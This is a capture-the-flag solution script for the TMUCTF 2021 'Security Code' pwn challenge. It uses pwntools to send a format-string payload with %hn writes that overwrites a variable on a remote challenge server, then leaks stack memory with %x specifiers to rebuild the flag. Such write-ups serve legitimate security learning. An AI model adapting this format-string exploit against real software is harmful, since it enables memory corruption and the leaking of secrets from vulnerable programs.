
```python
from pwn import *

flag = ''

# Connect 30 times (just a number large enough to cover every character of the flag).
# Each iteration changes the stack offset the flag value is read from.
for i in range(30):

    # Connect to the program using pwntools.
    # r = process("./securitycode")
    r = remote('185.97.118.167', 7040)

    # Send 'A' first so we are forwarded to hello_admin.
    r.recvuntil(b"Enter 'A' for admin and 'U' for user.")
    r.sendline(b'A')

    # Value to write: 0xABADCAFE
    # ABAD: 43949
    # CAFE: 51966
    # This value has to be written to the address of security_code.
    # Because it is wider than two bytes, the format string writes it as two halves with %hn.
    # %hn stores the number of characters printed so far, so the smaller half goes first:
    # 8 address bytes + 43941 padding = 43949 (ABAD) is written through stack argument 15,
    # then 8017 more characters bring the count to 51966 (CAFE) for argument 16.
    r.recvuntil(b'Enter you name:')
    payload = b'\x3e\xc0\x04\x08\x3c\xc0\x04\x08%43941x%15$hn%8017x%16$hn'
    r.sendline(payload)

    # Now read the flag from the stack step by step.
    r.recvuntil(b'Enter your password:')
    payload = '%{}$x'.format(i).encode()
    r.sendline(payload)

    x = r.recvline()
    x += r.recvline()
    x += r.recvline()
    x = x.decode(errors='ignore').replace('The password is ', '').strip()
    # It's just a method I used; it's not very clean, but it got me the flag :)!
    try:
        # Each leaked word is little-endian hex, so decode it and reverse the characters.
        flag += bytearray.fromhex(x).decode()[::-1]
    except ValueError:
        # Offsets that do not hold printable hex data are skipped.
        pass
    r.close()

print(flag)
```

[Original Writeup with more details](https://github.com/Execut3/CTF-WriteUps/tree/master/2021/TMUCTF/Pwn/Security%20Code)
